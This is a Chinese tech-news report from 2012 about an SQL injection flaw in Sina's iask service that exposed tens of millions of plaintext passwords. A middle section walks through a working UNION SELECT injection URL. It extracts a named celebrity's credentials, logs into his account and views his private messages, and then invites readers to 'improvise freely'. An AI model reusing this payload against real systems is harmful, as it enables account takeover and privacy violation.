【IT168 资讯】1月5日消息，元旦刚过，发生在2011年末的“泄密门”事件（点击这里回顾泄密门事件）刚刚沉默了两天，今天又爆出新浪微博存在密码泄漏漏洞。据游侠安全网发布的消息称，新浪网iask存在SQL注入漏洞，利用该漏洞黑客可读取iask数据库的内容，包括明文密码在内的7000多万新浪用户信息。据悉，新浪目前已经修复了此漏洞。

　　据游侠给出的质疑表示，新浪在csdn、天涯等用户库泄露后申称新浪数据库并没有泄露，而且密码是密文保存。这里要提出质疑了，数据库密码明明是明文保存。至少iask中大部分用户是明文保存密码（部分用户查不到密码）。至于用户信息是否泄露，这个不用说了把？

　　这里演示通过新浪微博获取刘谦的微博账号和密码：

　　1、点击刘谦的个人资料，我们可以在浏览器地址栏处看到刘谦的uid(新浪用户数字id)，此处uid为12715428867；

▲上图为刘谦的微博页面

　　2、直接构造地址：

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--

　　3、直接获得刘谦的账号和密码：

▲这里账号是luchenmagic密码为2lo*****（保密）

　　4、尝试登录：

▲登录成功，这里可以看到刘谦的各种私信、聊天记录之类

　　接下来的事情你可以自由发挥了，但是对于一个黑客而言，这只不过是一个开始而已。

　　回顾这段时间以来所有网站泄密事件，国内各大网站几乎无一幸免，作为中国的互联网用户，这段时间大家都很无奈的选择了改密码改到手软。但是，改了密码以后就安全了吗？在防止数据泄漏方面，作为一名互联网用户，能做的也就这样了，更多的责任还是要靠网站本身加强安全防范措施。但目前，大多数的网站安全意识非常淡薄，也没有专门的安全管理人员，安全投入也很少。这次的数据泄漏事件给所有的互联网公司、用户以及安全厂商于警示。未来要如何做，让我们拭目以待！

　　注：本文新闻素材来源于游侠安全网，在此特别感谢游侠的支持！点击这里查看来源：http://www.youxia.org/2012/01/2012-SINA-weibo-user-password-lose.html